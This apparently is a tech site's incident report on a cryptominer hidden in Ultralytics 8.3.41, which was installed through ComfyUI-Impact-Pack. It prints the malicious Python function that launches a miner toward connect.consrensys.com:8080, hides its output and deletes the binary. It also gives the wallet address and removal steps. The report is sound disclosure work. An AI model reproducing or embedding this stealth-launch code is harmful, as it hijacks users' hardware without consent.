Potential Cryptocurrency Mining Attack Report: Security Issues in ComfyUI and Ultralytics

Overview

Recently, unauthorized cryptocurrency mining activity was suspected while using ComfyUI with the ComfyUI-Impact-Pack extension. The issue originates from malicious Python code in the Ultralytics package, which attempts to use system resources for unauthorized mining operations.

Problem Description

The incident involves a downloaded module located at the following path (downloads.py): YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils

Malicious Code Sample

The following malicious code was detected:

def safe_run(path):
    os.chmod(path, 0o770)
    command = [
        path,
        '-u',
        '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
        '-o',
        'connect.consrensys.com:8080',
        '-k'
    ]
    process = subprocess.Popen(
        command,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        preexec_fn=os.setsid,
        close_fds=True
    )
    os.remove(path)

Behavior Analysis

Permission Change: Uses os.chmod to make the file executable.
Executing Malicious Commands: Connects to the mining pool server connect.consrensys.com:8080.
Process Hiding: Suppresses input, output, and error streams to avoid detection.
File Removal: Deletes the file after execution to hide evidence.

Risk Assessment

Potential Impacts

High System Resource Usage: Mining significantly increases CPU/GPU load.
Hardware Wear: Prolonged high usage may shorten hardware lifespan.
Security Risks: Could endanger sensitive data or overall system security.

Source of the Issue

This malicious activity is linked to a suspicious version of the Ultralytics package, which appears to be installed as an automatic dependency of ComfyUI-Impact-Pack.

Installation Path

Suspicious Package: Ultralytics version 8.3.41
Location: YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics

Trigger

Likely triggered by the install.py script in ComfyUI-Impact-Pack, which auto-installs dependencies.

Network Behavior Analysis

Target Domain

Domain Name: connect.consrensys.com
Port: 8080
Purpose: Suspected mining pool endpoint, likely using the Stratum protocol.

Evidence

Explicit mining pool connection details in the script.
Use of a private key (e.g., 4BHRQHF...) indicates active mining account or operation.

Recommended Actions

Uninstall Suspicious Packages

pip uninstall ultralytics ultralytics-thop

Remove ComfyUI-Impact-Pack Delete related directory:
```
./ComfyUI/custom_nodes/ComfyUI-Impact-Pack
```
Scan Your System Use antivirus software and malware detection tools to ensure no ongoing threats.
Monitor Network Connections Check for external connections to connect.consrensys.com and block it in the firewall.
Raise Awareness Share this report with the maintainers of ComfyUI and Ultralytics to prevent further abuse.

Additional Evidence

Code Location: YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils/downloads.py
Behavior Pattern: Unauthorized file execution, mining pool connection, and evidence cleaning.
Trigger Condition: Automatic dependency installation by ComfyUI-Impact-Pack.

References

ComfyUI-Impact-Pack/issues/843

Conclusion

This incident highlights the risks of insufficient dependency review in open-source projects, which can expose users’ systems to malicious attacks. The open-source community should adopt stricter review mechanisms to protect end-users.

Potential Cryptocurrency Mining Attack Report: Security Issues in ComfyUI and Ultralytics

Overview

Problem Description

Malicious Code Sample

Behavior Analysis

Risk Assessment

Potential Impacts

Source of the Issue

Installation Path

Trigger

Network Behavior Analysis

Target Domain

Evidence

Recommended Actions

Additional Evidence

References

Conclusion

DMflow.chat

ad

OpenAI to Release an Open-Source Reasoning Model: A Game-Changer in AI

ChatGPT’s Native Image Generation Feature Now Available for Free Users! A New Era of AI Creativity?

Musk’s AI Power Move: xAI Merges with X, Valuation Soars to $80 Billion—Aiming for AI Dominance

Vecto3D: An Ultra-Simple Tool to Convert Your SVG into 3D Models

Open Source AI Music Revolution! YuE Model Officially Launched, Generating Professional-Level Vocals and Accompaniment

Manus Officially Launches Paid Plans: Starter Package at $39/Month

The Inner Workings of AI: How They Peek into Claude’s Thoughts?

OpenAI Day 6: Chatbot Feature Upgrade: Real-Time Interaction and Holiday Surprises

OpenAI Announces Support for Anthropic's MCP Standard, Agent SDK to Integrate MCP

Communeify

Hello, we want to use some third-party cookies and scripts to enhance the functionality of this website.

Potential Cryptocurrency Mining Attack Report: Security Issues in ComfyUI and Ultralytics

Overview

Problem Description

Malicious Code Sample

Behavior Analysis

Risk Assessment

Potential Impacts

Source of the Issue

Installation Path

Trigger

Network Behavior Analysis

Target Domain

Evidence

Recommended Actions

Additional Evidence

Related Details

References

Conclusion

DMflow.chat

ad

Communeify

Links